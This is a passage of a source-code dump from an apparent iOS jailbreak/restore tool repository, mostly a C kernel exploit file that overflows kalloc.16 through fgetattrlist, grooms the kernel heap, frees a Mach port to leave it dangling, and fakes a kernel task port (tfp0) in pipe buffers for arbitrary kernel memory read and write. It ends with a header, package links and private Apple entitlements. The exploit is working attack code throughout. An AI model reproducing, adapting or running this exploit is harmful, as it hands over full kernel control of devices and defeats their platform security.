prepare_vfs_overflow() { 305 | vfs_fd = open("/", O_RDONLY); 306 | if (vfs_fd == -1) { 307 | perror("unable to open fs root\n"); 308 | return; 309 | } 310 | 311 | 312 | al.bitmapcount = ATTR_BIT_MAP_COUNT; 313 | al.volattr = 0xfff; 314 | al.commonattr = ATTR_CMN_RETURNED_ATTRS; 315 | 316 | attrBuf = malloc(attrBufSize); 317 | } 318 | 319 | // this will do a kalloc.16, overflow out of it with 8 NULL bytes, then free it 320 | void do_vfs_overflow() { 321 | int options = 0; 322 | int err = fgetattrlist(vfs_fd, &al, attrBuf, attrBufSize, options); 323 | //printf("err: %d\n", err); 324 | } 325 | 326 | mach_port_t initial_early_kallocs[80000]; 327 | int next_early_kalloc = 0; 328 | 329 | mach_port_t middle_kallocs[80000]; 330 | int next_middle_kalloc = 0; 331 | 332 | 333 | // in the end I don't use these, but maybe they help? 334 | 335 | volatile int keep_spinning = 1; 336 | void* spinner(void* arg) { 337 | while(keep_spinning); 338 | return NULL; 339 | } 340 | 341 | #define N_SPINNERS 25 342 | pthread_t spin_threads[N_SPINNERS]; 343 | 344 | void start_spinners() { 345 | for (int i = 0; i < N_SPINNERS; i++) { 346 | pthread_create(&spin_threads[i], NULL, spinner, NULL); 347 | } 348 | } 349 | 350 | void stop_spinners() { 351 | keep_spinning = 0; 352 | for (int i = 0; i < N_SPINNERS; i++) { 353 | pthread_join(spin_threads[i], NULL); 354 | } 355 | } 356 | 357 | const int total_fds = 14*0x1f*8; 358 | int read_ends[total_fds]; 359 | int write_ends[total_fds]; 360 | int next_pipe_index = 0; 361 | 362 | mach_port_t early_read_port = MACH_PORT_NULL; 363 | int early_read_read_fd = -1; 364 | int early_read_write_fd = -1; 365 | uint64_t early_read_known_kaddr = 0; 366 | 367 | // read_fd and write_fd are the pipe fds which have a pipe buffer at known_addr 368 | void prepare_early_read_primitive(mach_port_t target_port, int read_fd, int write_fd, uint64_t known_kaddr) { 369 | early_read_port = target_port; 370 | early_read_read_fd = read_fd; 371 | early_read_write_fd = write_fd; 372 | early_read_known_kaddr = known_kaddr; 373 | } 374 | 375 | uint32_t early_rk32(uint64_t kaddr) { 376 | uint8_t* buf = malloc(0xfff); 377 | read(early_read_read_fd, buf, 0xfff); 378 | build_fake_task_port(buf, early_read_known_kaddr, kaddr, 0, 0, 0); 379 | write(early_read_write_fd, buf, 0xfff); 380 | 381 | uint32_t val = 0; 382 | kern_return_t err = pid_for_task(early_read_port, (int *)&val); 383 | if (err != KERN_SUCCESS) { 384 | printf("pid_for_task returned %x (%s)\n", err, mach_error_string(err)); 385 | } 386 | printf("read val via pid_for_task: %08x\n", val); 387 | free(buf); 388 | return val; 389 | } 390 | 391 | uint64_t early_rk64(uint64_t kaddr) { 392 | uint64_t lower = (uint64_t)early_rk32(kaddr); 393 | uint64_t upper = (uint64_t)early_rk32(kaddr + 4); 394 | uint64_t final = lower | (upper << 32); 395 | return final; 396 | } 397 | 398 | void vfs_sploit() { 399 | printf("empty_list by @i41nbeer\n"); 400 | offsets_init(); 401 | 402 | start_spinners(); 403 | printf("vfs_sploit\n"); 404 | increase_limits(); 405 | 406 | size_t kernel_page_size = 0; 407 | host_page_size(mach_host_self(), &kernel_page_size); 408 | if (kernel_page_size == 0x4000) { 409 | printf("this device uses 16k kernel pages\n"); 410 | } else if (kernel_page_size == 0x1000) { 411 | printf("this device uses 4k kernel pages\n"); 412 | } else { 413 | printf("this device uses an unsupported kernel page size\n"); 414 | exit(EXIT_FAILURE); 415 | } 416 | 417 | 418 | prepare_vfs_overflow(); 419 | // set up the heap: 420 | 421 | // allocate a pool of early ports; we'll use some of these later 422 | alloc_early_ports(); 423 | 424 | if (kernel_page_size == 0x1000) { 425 | mach_port_t initial_kallocs_holder = hold_kallocs(0x10, 100, 100, MACH_PORT_NULL, NULL); 426 | } 427 | 428 | // 0x110 will be the kalloc size of the ipc_kmsg allocation for the kalloc.16 messages 429 | // we need to ensure that these allocations don't interfere with the page-level groom, 430 | // so ensure there's a long freelist for them 431 | 432 | // make 30'000 kalloc(0x110) calls then free them all 433 | mach_port_t flp = hold_kallocs(0x110, 100, 500, MACH_PORT_NULL, NULL); 434 | mach_port_destroy(mach_task_self(), flp); 435 | 436 | // try to groom our initial pattern: 437 | // kalloc.16 | ipc_ports | kalloc.16 | ipc_ports ... 438 | // first off we're just trying to get the pages like that 439 | 440 | int INITIAL_PATTERN_REPEATS = kernel_page_size == 0x4000 ? 40 : 60; 441 | mach_port_t kalloc_holder_port = MACH_PORT_NULL; 442 | 443 | 444 | int kallocs_per_zcram = (int)kernel_page_size/0x10; // 0x1000 with small kernel pages, 0x4000 with large 445 | int ports_per_zcram = kernel_page_size == 0x1000 ? 0x49 : 0x61; // 0x3000 with small kernel pages, 0x4000 with large 446 | 447 | for (int i = 0; i < INITIAL_PATTERN_REPEATS; i++) { 448 | // 1 page of kalloc 449 | for (int i = 0; i < kallocs_per_zcram; i++) { 450 | mach_port_t p = kalloc_16(); 451 | initial_early_kallocs[next_early_kalloc++] = p; 452 | } 453 | 454 | // 1 full allocation set of ports: 455 | for (int i = 0; i < ports_per_zcram; i++) { 456 | mach_port_t port = alloc_middle_port(); 457 | } 458 | } 459 | 460 | // now we hopefully have a nice arrangement of repeated fresh 'k.16 | ipc_port' pages 461 | // to understand this next bit it's important to notice that zone allocations will come first 462 | // from intermediate (partially full) pages. This means that if we just start free'ing and 463 | // allocating k.16 objects somewhere in the middle of the groom they won't be re-used until 464 | // the current intermediate page is either full or empty. 465 | 466 | // this provides a challenge because fresh page's freelist's are filled semi-randomly such that 467 | // their allocations will go from the inside to the outside: 468 | // 469 | // | 9 8 6 5 2 1 3 4 7 10 | <-- example "randomized" allocation order from a fresh all-free page 470 | // 471 | // this means that our final intermediate k.16 and ports pages will look a bit like this: 472 | // 473 | // | - - - 5 2 1 3 4 - - | - - - 4 1 2 3 5 - - | 474 | // kalloc.16 ipc_ports 475 | 476 | // if we use the overflow to corrupt a freelist entry we'll panic if it gets allocated, so we 477 | // need to avoid that 478 | 479 | // the trick is that by controlling the allocation and free order we can reverse the freelists such that 480 | // the final intermediate pages will look more like this: 481 | // 482 | // | 1 4 - - - - - 5 3 2 | 2 5 - - - - - 4 3 1 | 483 | // kalloc.16 ipc_ports 484 | // 485 | // at this point we're much more likely to be able to free a kalloc.16 and realloc it for the overflow 486 | // such that we can hit the first qword of an ipc_port 487 | 488 | 489 | // free them all, reversing the freelists! 490 | for (int i = 0; i < next_early_kalloc; i++) { 491 | discard_message(initial_early_kallocs[i]); 492 | } 493 | 494 | int HOP_BACK = kernel_page_size == 0x4000 ? 16 : 30; 495 | 496 | for (int i = 0; i < INITIAL_PATTERN_REPEATS - HOP_BACK; i++) { 497 | for (int i = 0; i < kallocs_per_zcram; i++) { 498 | mach_port_t p = kalloc_16(); 499 | middle_kallocs[next_middle_kalloc++] = p; 500 | } 501 | } 502 | 503 | mach_port_t target_port = MACH_PORT_NULL; 504 | 505 | int first_candidate_port_index = next_middle_port - ((HOP_BACK+2)*ports_per_zcram); // 32 35 +2 506 | int last_candidate_port_index = next_middle_port - ((HOP_BACK-2)*ports_per_zcram); // 28 25 -2 507 | 508 | //sched_yield(); 509 | // wait a second 510 | // this is a load-bearing sleep - this works better than sched_yield 511 | // we want this loop to be as fast as possible, and ideally not get pre-empted 512 | // don't remove this :) 513 | sleep(1); 514 | for (int i = 0; i < kallocs_per_zcram; i++) { 515 | mach_port_t kp = middle_kallocs[next_middle_kalloc-20-1]; 516 | next_middle_kalloc--; 517 | 518 | discard_message(kp); 519 | 520 | do_vfs_overflow(); 521 | 522 | // realloc 523 | mach_port_t replacer_f = kalloc_16(); 524 | 525 | // loop through the candidate overwrite target ports and see if they were hit 526 | // we can detect this via mach_port_kobject; if we know the name we pass it is valid 527 | // but we get KERN_INVALID_RIGHT then we cleared the io_active bit 528 | 529 | for (int j = first_candidate_port_index; j < last_candidate_port_index; j++){ 530 | mach_port_t candidate_port = middle_ports[j]; 531 | kern_return_t err; 532 | natural_t typep = 0; 533 | mach_vm_address_t addr = 0; 534 | 535 | err = mach_port_kobject(mach_task_self(), 536 | candidate_port, 537 | &typep, 538 | &addr); 539 | if (err != KERN_SUCCESS) { 540 | printf("found the port! %x\n", candidate_port); 541 | target_port = candidate_port; 542 | break; 543 | } 544 | } 545 | if (target_port != MACH_PORT_NULL) { 546 | break; 547 | } 548 | } 549 | 550 | stop_spinners(); 551 | 552 | // lets stash the ports we want to keep: 553 | 554 | // we know the dangling port is about 30 loops back from the end of the middle_ports 555 | // lets keep hold of a region about 3 loop iterations ahead of this 556 | 557 | #define CANARY_REGION 4 558 | 559 | int ports_to_hold = ports_per_zcram; //ports_per_zcram * 3;//0x49*3; 560 | mach_port_t hold_ports[ports_to_hold]; 561 | for (int i = 0; i < ports_to_hold; i++) { 562 | int source_index = ((INITIAL_PATTERN_REPEATS - HOP_BACK + CANARY_REGION) * ports_per_zcram) + i; // 20 10 563 | hold_ports[i] = middle_ports[source_index]; 564 | middle_ports[source_index] = MACH_PORT_NULL; 565 | } 566 | 567 | // now dump all our ports 568 | // we can keep the early ports, we'll continue to use them for kallocs and stuff 569 | 570 | for (int i = 0; i < next_middle_port; i++) { 571 | mach_port_t port = middle_ports[i]; 572 | if (port == MACH_PORT_NULL) { 573 | continue; 574 | } 575 | if (port == target_port) { 576 | // cause the target port to be freed but leave us a dangling entry in the port table 577 | // note that the port isn't active so we need a code path which will take and drop a reference 578 | // but won't do anything if the port isn't active (like trying to give us a DEAD_NAME) 579 | int new_size = 100; 580 | kern_return_t err = mach_port_set_attributes(mach_task_self(), target_port, MACH_PORT_DNREQUESTS_SIZE, (mach_port_info_t)&new_size, sizeof(int)); 581 | if (err != KERN_SUCCESS) { 582 | printf("mach_port_set_attributes failed %s\n", mach_error_string(err)); 583 | } else { 584 | printf("freed the port\n"); 585 | } 586 | } else { 587 | mach_port_destroy(mach_task_self(), port); 588 | } 589 | } 590 | 591 | // 150MB 592 | #define N_COLLECTABLES 3 593 | mach_port_t collectable_ports[N_COLLECTABLES]; 594 | for (int i = 0; i < N_COLLECTABLES; i++) { 595 | collectable_ports[i] = hold_kallocs(0x800, 0x3e, 400, MACH_PORT_NULL, NULL); 596 | } 597 | 598 | for (int i = 0; i < N_COLLECTABLES; i++) { 599 | mach_port_destroy(mach_task_self(), collectable_ports[i]); 600 | } 601 | 602 | 603 | // choose a port from the middle of the holder range as our canary: 604 | mach_port_t canary_port = hold_ports[ports_to_hold/2]; 605 | mach_port_insert_right(mach_task_self(), canary_port, canary_port, MACH_MSG_TYPE_MAKE_SEND); 606 | 607 | 608 | // now try to cause the GC by allocating many copies of the replacer object: 609 | // the goal is to get the canary port overlapping the ip_context field of the dangling port 610 | mach_port_t replacer_object[0x200] = {0}; 611 | replacer_object[koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)/8] = canary_port; 612 | 613 | // the replacer object allocation is a 0x1000 alloc 614 | // using the same maths as above lets allocate 200 MB of them, 615 | // slowly, hoping to cause GC: 616 | //int n_gc_ports = 200; 617 | int n_gc_ports = 250; // 200 618 | mach_port_t gc_ports[n_gc_ports]; 619 | for (int i = 0; i < n_gc_ports; i++) { 620 | gc_ports[i] = hold_kallocs(0x1000, 0x1f, 8, MACH_PORT_NULL, replacer_object); 621 | printf("gc tick %d\n", i); 622 | pthread_yield_np(); 623 | usleep(10000); 624 | } 625 | printf("did that trigger a gc and realloc?\n"); 626 | 627 | // if that worked we should now be able to find the address of the canary port: 628 | uint64_t canary_port_kaddr = 0; 629 | kern_return_t err; 630 | err = mach_port_get_context(mach_task_self(), target_port, (mach_port_context_t *)&canary_port_kaddr); 631 | if (err != KERN_SUCCESS) { 632 | printf("error getting context from the target port (but no panic...): %s\n", mach_error_string(err)); 633 | } 634 | 635 | printf("the canary port is at %016llx\n", canary_port_kaddr); 636 | 637 | // lets modify the port so we can detect when we receive the message which has the OOL_PORTS descriptor which 638 | // overlaps the dangling target port: 639 | 640 | // we should be a bit more careful doing this to not go off the end: 641 | uint64_t fake_canary_kport_addr = canary_port_kaddr + 0xa8; 642 | 643 | err = mach_port_set_context(mach_task_self(), target_port, fake_canary_kport_addr); 644 | 645 | 646 | // lets build the contents of the pipe buffer 647 | // we're gonna hope that we can get this allocated pretty near the canary port: 648 | size_t pipe_buffer_size = 0xfff; // this is for kalloc.4096 649 | uint8_t* pipe_buf = malloc(0x1000); 650 | memset(pipe_buf, 0, 0x1000); 651 | 652 | uint64_t pipe_target_kaddr_offset = kernel_page_size == 0x4000 ? 0x20000 : 0x10000; 653 | 654 | uint64_t pipe_target_kaddr = (canary_port_kaddr + pipe_target_kaddr_offset) & (~0xfffULL); // 0x10000 655 | printf("pipe_target_kaddr: %016llx\n", pipe_target_kaddr); 656 | 657 | build_fake_task_port(pipe_buf, pipe_target_kaddr, pipe_target_kaddr, 0, 0, 0); 658 | 659 | 660 | // now go through each of the hold_kalloc messages and receive them. 661 | // check if they contained the canary port 662 | // reallocate them 663 | 664 | mach_port_t secondary_leaker_ports[200] = {0}; 665 | 666 | struct { 667 | mach_msg_header_t hdr; 668 | mach_msg_body_t body; 669 | mach_msg_ool_ports_descriptor_t ool_ports[0x1f]; 670 | mach_msg_trailer_t trailer; 671 | char pad[1000]; 672 | } msg = {0}; 673 | 674 | printf("sizeof(msg) 0x%x\n", (unsigned int)sizeof(msg)); 675 | 676 | int hit_dangler = 0; 677 | int dangler_hits = 0; 678 | printf("the canary port is: %x\n", canary_port); 679 | 680 | mach_port_t fake_canary_port = MACH_PORT_NULL; 681 | 682 | for (int i = 0; i < n_gc_ports; i++) { 683 | mach_port_t gc_port = gc_ports[i]; 684 | 685 | for (int j = 0; j < 8; j++) { 686 | err = mach_msg(&msg.hdr, 687 | MACH_RCV_MSG, 688 | 0, 689 | sizeof(msg), 690 | gc_port, 691 | 0, 692 | 0); 693 | if (err != KERN_SUCCESS) { 694 | printf("failed to receive OOL_PORTS message (%d,%d) %s\n", i, j, mach_error_string(err)); 695 | } 696 | 697 | // check each of the canary ports: 698 | for (int k = 0; k < 0x1f; k++) { 699 | mach_port_t* ool_ports = msg.ool_ports[k].address; 700 | mach_port_t tester_port = ool_ports[koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)/8]; 701 | if (tester_port != canary_port) { 702 | printf("found the mis-matching OOL discriptor (%x)\n", tester_port); 703 | hit_dangler = 1; 704 | fake_canary_port = tester_port; 705 | } else { 706 | // drop the UREF 707 | mach_port_deallocate(mach_task_self(), tester_port); 708 | } 709 | } 710 | } 711 | 712 | if (!hit_dangler) { 713 | // if we haven't yet hit the dangler, try to reallocate this memory: 714 | secondary_leaker_ports[i] = hold_kallocs(0x1000, 0x1f, 8, MACH_PORT_NULL, NULL); 715 | } else { 716 | if (dangler_hits == 14) { 717 | // we'll run out of pipe kva so stop now 718 | printf("hopefully that's enough pipes\n"); 719 | break; 720 | } 721 | for (int i = 0; i < (0x1f*8); i++) { 722 | // we have hit the dangler; from now on out we'll realloc with pipes 723 | // pipe memory is limited 724 | int fds[2] = {0}; 725 | int err = pipe(fds); 726 | if (err != 0) { 727 | perror("pipe failed\n"); 728 | } 729 | 730 | int read_end = fds[0]; 731 | int write_end = fds[1]; 732 | 733 | int flags = fcntl(write_end, F_GETFL); 734 | flags |= O_NONBLOCK; 735 | fcntl(write_end, F_SETFL, flags); 736 | 737 | build_fake_task_port(pipe_buf, pipe_target_kaddr, pipe_target_kaddr, 0, 0, next_pipe_index); 738 | 739 | ssize_t amount_written = write(write_end, pipe_buf, 0xfff); 740 | if (amount_written != 0xfff) { 741 | printf("amount written was short: 0x%x\n", (unsigned int)amount_written); 742 | } 743 | 744 | read_ends[next_pipe_index] = read_end; 745 | write_ends[next_pipe_index++] = write_end; 746 | 747 | } 748 | dangler_hits++; 749 | } 750 | 751 | } 752 | 753 | 754 | printf("replaced with pipes hopefully... take a look\n"); 755 | 756 | // check the kernel object type of the dangling port: 757 | int otype = 0; 758 | mach_vm_address_t oaddr = 0; 759 | err = mach_port_kobject(mach_task_self(), target_port, (natural_t *)&otype, &oaddr); 760 | if (err != KERN_SUCCESS) { 761 | printf("mach_port_kobject failed: %x %s\n", err, mach_error_string(err)); 762 | } 763 | printf("dangling port type: %x\n", otype); 764 | 765 | uint64_t replacer_pipe_index = 0xfffffff; 766 | err = mach_port_get_context(mach_task_self(), target_port, (mach_port_context_t *)&replacer_pipe_index); 767 | printf("got replaced with pipe fd index %d\n", (int)replacer_pipe_index); 768 | 769 | printf("gonna try a read...\n"); 770 | 771 | uint32_t val = 0; 772 | err = pid_for_task(target_port, (int *)&val); 773 | if (err != KERN_SUCCESS) { 774 | printf("pid_for_task returned %x (%s)\n", err, mach_error_string(err)); 775 | } 776 | printf("read val via pid_for_task: %08x\n", val); 777 | 778 | 779 | // at this point we know: 780 | // * which pipe fd overlaps with the dangling port 781 | // * the kernel address of the canary port (which is still a dangling port) 782 | // * the kernel address of the fake task (which is a pipe buffer, but we don't know which one) 783 | 784 | // things will be easier if we can learn the address of the dangling port giving us the address of the pipe buffer and a what/where primitive 785 | // we could hack around that by always rewriting all the pipes each time I guess... 786 | 787 | // for each pipe, apart from the one which we know overlaps with the port, replace the field which determines where to read from, then do the kernel read and see if the value is no longer 0x80000002 788 | char* old_contents = malloc(0xfff); 789 | char* new_contents = malloc(0xfff); 790 | int pipe_target_kaddr_replacer_index = -1; 791 | for (int i = 0; i < next_pipe_index; i++) { 792 | if (i == replacer_pipe_index) { 793 | continue; 794 | } 795 | read(read_ends[i], old_contents, 0xfff); 796 | build_fake_task_port((uint8_t *)new_contents, pipe_target_kaddr, pipe_target_kaddr+4, 0, 0, 0); 797 | write(write_ends[i], new_contents, 0xfff); 798 | 799 | // try the read, did it change? 800 | uint32_t val = 0; 801 | err = pid_for_task(target_port, (int *)&val); 802 | if (err != KERN_SUCCESS) { 803 | printf("pid_for_task returned %x (%s)\n", err, mach_error_string(err)); 804 | } 805 | printf("read val via pid_for_task: %08x\n", val); 806 | if (val != 0x80000002) { 807 | printf("replacer fd index %d is at the pipe_target_kaddr\n", i); 808 | pipe_target_kaddr_replacer_index = i; 809 | break; 810 | } 811 | } 812 | free(old_contents); 813 | free(new_contents); 814 | if (pipe_target_kaddr_replacer_index == -1) { 815 | printf("failed to find the pipe_target_kaddr_replacer pipe\n"); 816 | } 817 | 818 | // now we know which pipe fd matches up with where the fake task is so 819 | // bootstrap the early read primitives 820 | 821 | prepare_early_read_primitive(target_port, read_ends[pipe_target_kaddr_replacer_index], write_ends[pipe_target_kaddr_replacer_index], pipe_target_kaddr); 822 | 823 | // we can now use early_rk{32,64} 824 | 825 | // send a message to the canary port containing a send right to the host port; 826 | // use the arbitrary read to find that, and from there find the kernel task port 827 | 828 | mach_msg_header_t host_msg = {0}; 829 | host_msg.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, MACH_MSG_TYPE_COPY_SEND); 830 | host_msg.msgh_size = sizeof(host_msg); 831 | host_msg.msgh_remote_port = canary_port; 832 | host_msg.msgh_local_port = mach_host_self(); 833 | host_msg.msgh_id = 0x12344321; 834 | 835 | err = mach_msg(&host_msg, 836 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE, 837 | sizeof(host_msg), 838 | 0, 839 | MACH_PORT_NULL, 840 | MACH_MSG_TIMEOUT_NONE, 841 | MACH_PORT_NULL); 842 | if (err != KERN_SUCCESS) { 843 | printf("failed to send host message to canary port %s\n", mach_error_string(err)); 844 | //exit(EXIT_FAILURE); 845 | } 846 | printf("sent host_msg to canary port, let's find it and locate the host port\n"); 847 | 848 | uint64_t host_kmsg = early_rk64(canary_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE)); 849 | printf("host_kmsg: %016llx\n", host_kmsg); 850 | 851 | // hexdump the kmsg: 852 | //for (int i = 0; i < 100; i++) { 853 | // uint64_t val = early_rk64(host_kmsg + (i*8)); 854 | // printf("%016llx: %016llx\n", host_kmsg + (i*8), val); 855 | //} 856 | uint64_t host_port_kaddr = early_rk64(host_kmsg + 0xac); // could parse the message to find this rather than hardcode 857 | 858 | // do the same thing again to get our task port: 859 | discard_message(canary_port); 860 | 861 | host_msg.msgh_local_port = mach_task_self(); 862 | err = mach_msg(&host_msg, 863 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE, 864 | sizeof(host_msg), 865 | 0, 866 | MACH_PORT_NULL, 867 | MACH_MSG_TIMEOUT_NONE, 868 | MACH_PORT_NULL); 869 | if (err != KERN_SUCCESS) { 870 | printf("failed to send host message to canary port %s\n", mach_error_string(err)); 871 | //exit(EXIT_FAILURE); 872 | } 873 | printf("sent task_msg to canary port, let's find it and locate the host port\n"); 874 | 875 | uint64_t task_kmsg = early_rk64(canary_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE)); 876 | printf("task_kmsg: %016llx\n", task_kmsg); 877 | 878 | 879 | uint64_t task_port_kaddr = early_rk64(host_kmsg + 0xac); 880 | 881 | printf("our task port is at %016llx\n", task_port_kaddr); 882 | 883 | 884 | 885 | // now we can copy-paste some code from multi_path: 886 | // for the full read/write primitive we need to find the kernel vm_map and the kernel ipc_space 887 | // we can get the ipc_space easily from the host port (receiver field): 888 | uint64_t ipc_space_kernel = early_rk64(host_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)); 889 | 890 | printf("ipc_space_kernel: %016llx\n", ipc_space_kernel); 891 | 892 | // the kernel vm_map is a little trickier to find 893 | // we can use the trick from mach_portal to find the kernel task port because we know it's gonna be near the host_port on the heap: 894 | 895 | // find the start of the zone block containing the host and kernel task pointers: 896 | 897 | uint64_t offset = host_port_kaddr & 0xfff; 898 | uint64_t first_port = 0; 899 | if ((offset % 0xa8) == 0) { 900 | printf("host port is on first page\n"); 901 | first_port = host_port_kaddr & ~(0xfff); 902 | } else if(((offset+0x1000) % 0xa8) == 0) { 903 | printf("host port is on second page\n"); 904 | first_port = (host_port_kaddr-0x1000) & ~(0xfff); 905 | } else if(((offset+0x2000) % 0xa8) == 0) { 906 | printf("host port is on second page\n"); 907 | first_port = (host_port_kaddr-0x2000) & ~(0xfff); 908 | } else { 909 | printf("hummm, my assumptions about port allocations are wrong...\n"); 910 | } 911 | 912 | printf("first port is at %016llx\n", first_port); 913 | uint64_t kernel_vm_map = 0; 914 | for (int i = 0; i < ports_per_zcram; i++) { 915 | uint64_t early_port_kaddr = first_port + (i*0xa8); 916 | uint32_t io_bits = early_rk32(early_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS)); 917 | 918 | if (io_bits != (IO_BITS_ACTIVE | IKOT_TASK)) { 919 | continue; 920 | } 921 | 922 | // get that port's kobject: 923 | uint64_t task_t = early_rk64(early_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 924 | if (task_t == 0) { 925 | printf("weird heap object with NULL kobject\n"); 926 | continue; 927 | } 928 | 929 | // check the pid via the bsd_info: 930 | uint64_t bsd_info = early_rk64(task_t + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO)); 931 | if (bsd_info == 0) { 932 | printf("task doesn't have a bsd info\n"); 933 | continue; 934 | } 935 | uint32_t pid = early_rk32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID)); 936 | if (pid != 0) { 937 | printf("task isn't the kernel task\n"); 938 | } 939 | 940 | // found the right task, get the vm_map 941 | kernel_vm_map = early_rk64(task_t + koffset(KSTRUCT_OFFSET_TASK_VM_MAP)); 942 | break; 943 | } 944 | 945 | if (kernel_vm_map == 0) { 946 | printf("unable to find the kernel task map\n"); 947 | return; 948 | } 949 | 950 | printf("kernel map:%016llx\n", kernel_vm_map); 951 | 952 | // find the address of the dangling port: 953 | uint64_t task_kaddr = early_rk64(task_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 954 | uint64_t itk_space = early_rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE)); 955 | uint64_t is_table = early_rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE)); 956 | 957 | const int sizeof_ipc_entry_t = 0x18; 958 | uint64_t target_port_kaddr = early_rk64(is_table + ((target_port >> 8) * sizeof_ipc_entry_t)); 959 | 960 | printf("dangling port kaddr is: %016llx\n", target_port_kaddr); 961 | 962 | // now we have everything to build a fake kernel task port for memory r/w: 963 | // we know which 964 | 965 | int target_port_read_fd = read_ends[replacer_pipe_index]; 966 | int target_port_write_fd = write_ends[replacer_pipe_index]; 967 | 968 | uint8_t* fake_tfp0_buf = malloc(0xfff); 969 | read(target_port_read_fd, fake_tfp0_buf, 0xfff); 970 | 971 | 972 | build_fake_task_port(fake_tfp0_buf, target_port_kaddr, 0x4242424243434343, kernel_vm_map, ipc_space_kernel, 0x1234); 973 | write(target_port_write_fd, fake_tfp0_buf, 0xfff); 974 | 975 | mach_port_t fake_tfp0 = target_port; 976 | printf("hopefully prepared a fake tfp0!\n"); 977 | 978 | // test it! 979 | vm_offset_t data_out = 0; 980 | mach_msg_type_number_t out_size = 0; 981 | err = mach_vm_read(fake_tfp0, kernel_vm_map, 0x40, &data_out, &out_size); 982 | if (err != KERN_SUCCESS) { 983 | printf("mach_vm_read failed: %x %s\n", err, mach_error_string(err)); 984 | sleep(3); 985 | exit(EXIT_FAILURE); 986 | } 987 | 988 | printf("kernel read via second tfp0 port worked?\n"); 989 | printf("0x%016llx\n", *(uint64_t*)data_out); 990 | printf("0x%016llx\n", *(uint64_t*)(data_out+8)); 991 | printf("0x%016llx\n", *(uint64_t*)(data_out+0x10)); 992 | printf("0x%016llx\n", *(uint64_t*)(data_out+0x18)); 993 | 994 | prepare_for_rw_with_fake_tfp0(fake_tfp0); 995 | 996 | // can now use {r,w}k_{32,64} 997 | 998 | // cleanup: 999 | 1000 | // clean up the fake canary port entry: 1001 | wk64(is_table + ((fake_canary_port >> 8) * sizeof_ipc_entry_t), 0); 1002 | wk64(is_table + ((fake_canary_port >> 8) * sizeof_ipc_entry_t) + 8, 0); 1003 | 1004 | // leak the pipe buffer which replaces the dangling port: 1005 | 1006 | printf("going to try to clear up the pipes now\n"); 1007 | 1008 | // finally we have to fix up the pipe's buffer 1009 | // for this we need to find the process fd table: 1010 | // struct proc: 1011 | uint64_t proc_addr = rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO)); 1012 | 1013 | // struct filedesc 1014 | uint64_t filedesc = rk64(proc_addr + koffset(KSTRUCT_OFFSET_PROC_P_FD)); 1015 | 1016 | // base of ofiles array 1017 | uint64_t ofiles_base = rk64(filedesc + koffset(KSTRUCT_OFFSET_FILEDESC_FD_OFILES)); 1018 | 1019 | uint64_t ofiles_offset = ofiles_base + (target_port_read_fd * 8); 1020 | 1021 | // struct fileproc 1022 | uint64_t fileproc = rk64(ofiles_offset); 1023 | 1024 | // struct fileglob 1025 | uint64_t fileglob = rk64(fileproc + koffset(KSTRUCT_OFFSET_FILEPROC_F_FGLOB)); 1026 | 1027 | // struct pipe 1028 | uint64_t pipe = rk64(fileglob + koffset(KSTRUCT_OFFSET_FILEGLOB_FG_DATA)); 1029 | 1030 | // clear the inline struct pipebuf 1031 | printf("clearing pipebuf: %llx\n", pipe); 1032 | wk64(pipe + 0x00, 0); 1033 | wk64(pipe + 0x08, 0); 1034 | wk64(pipe + 0x10, 0); 1035 | 1036 | // do the same for the other end: 1037 | ofiles_offset = ofiles_base + (target_port_write_fd * 8); 1038 | 1039 | // struct fileproc 1040 | fileproc = rk64(ofiles_offset); 1041 | 1042 | // struct fileglob 1043 | fileglob = rk64(fileproc + koffset(KSTRUCT_OFFSET_FILEPROC_F_FGLOB)); 1044 | 1045 | // struct pipe 1046 | pipe = rk64(fileglob + koffset(KSTRUCT_OFFSET_FILEGLOB_FG_DATA)); 1047 | 1048 | printf("clearing pipebuf: %llx\n", pipe); 1049 | wk64(pipe + 0x00, 0); 1050 | wk64(pipe + 0x08, 0); 1051 | wk64(pipe + 0x10, 0); 1052 | 1053 | printf("done!\n"); 1054 | 1055 | printf("use the functions in kmem.h to read and write kernel memory\n"); 1056 | printf("tfp0 in there will stay alive once this process exits\n"); 1057 | printf("keep hold of a send right to it; don't expect this exploit to work again without a reboot\n"); 1058 | } 1059 | #endif /* WANT_CYDIA */ 1060 | 1061 | -------------------------------------------------------------------------------- /Rollectra/sploit.h: -------------------------------------------------------------------------------- 1 | #ifndef WANT_CYDIA 2 | #ifndef sploit_h 3 | #define sploit_h 4 | 5 | void vfs_sploit(void); 6 | 7 | #endif 8 | #endif /* WANT_CYDIA */ 9 | -------------------------------------------------------------------------------- /com.pwn20wnd.semirestore11_1.1-1_iphoneos-arm.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/com.pwn20wnd.semirestore11_1.1-1_iphoneos-arm.deb -------------------------------------------------------------------------------- /com.pwn20wnd.semirestore11_1.2-1_iphoneos-arm.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/com.pwn20wnd.semirestore11_1.2-1_iphoneos-arm.deb -------------------------------------------------------------------------------- /entitlements.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | com.apple.private.skip-library-validation 8 | 9 | com.apple.private.security.no-container 10 | 11 | com.apple.private.vfs.snapshot 12 | 13 | com.apple.springboard.wipedevice 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /layout/DEBIAN/control: 